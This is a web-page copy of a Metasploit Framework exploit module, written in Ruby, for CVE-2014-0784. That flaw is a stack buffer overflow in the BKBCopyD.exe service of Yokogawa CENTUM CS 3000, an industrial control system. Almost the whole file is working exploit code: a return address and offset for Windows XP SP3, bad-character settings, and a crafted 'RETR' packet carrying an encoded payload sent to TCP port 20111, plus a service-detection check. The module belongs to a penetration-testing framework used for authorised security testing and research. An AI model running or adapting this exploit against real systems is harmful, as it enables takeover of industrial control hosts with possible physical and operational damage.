Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability

18
          exists in the service BKBCopyD.exe when handling specially crafted packets. This module has

19
          been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.

20
        },

21
        'Author' => [

22
          'juan vazquez',

23
          'Redsadic <julian.vilas[at]gmail.com>'

24
        ],

25
        'References' => [

26
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],

27
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],

28
          [ 'CVE', '2014-0784']

29
        ],

30
        'Payload' => {

31
          'Space' => 373, # 500 for the full RETR argument

32
          'DisableNops' => true,

33
          'BadChars' => "\x00\x0d\x0a\xff",

34
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff\xff\xff" # Stack adjustment # add esp, -3500 # double \xff char to put it on memory

35
        },

36
        'DefaultOptions' => {

37
          'EXITFUNC' => 'thread',

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [

42
            'Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3',

43
            {

44
              'Ret' => 0x6404625d, # push esp # ret # libBKBUtil.dll]

45
              'Offset' => 123

46
            }

47
          ],

48
        ],

49
        'DisclosureDate' => '2014-03-10',

50
        'DefaultTarget' => 0,

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        Opt::RPORT(20111)

62
      ]

63
    )

64
  end

65


66
  def check

67
    pkt = build_probe

68
    res = send_pkt(pkt)

69
    if valid_response?(res)

70
      return Exploit::CheckCode::Detected

71
    end

72


73
    Exploit::CheckCode::Safe

74
  end

75


76
  def exploit

77
    data = "RETR "

78
    data << rand_text(target['Offset'])

79
    data << [target.ret].pack("V")

80
    data << payload.encoded

81
    data << "\n"

82


83
    print_status("Trying target #{target.name}, sending #{data.length} bytes...")

84
    connect

85
    sock.put(data)

86
    disconnect

87
  end

88


89
  def build_probe

90
    "#{rand_text_alpha(10)}\n"

91
  end

92


93
  def send_pkt(data)

94
    connect

95
    sock.put(data)

96
    data = sock.get_once

97
    disconnect

98


99
    return data

100
  end

101


102
  def valid_response?(data)

103
    return false unless !!data

104
    return false unless data =~ /500  'yyparse error': command not understood/

105


106
    return true

107
  end

108
end

109


110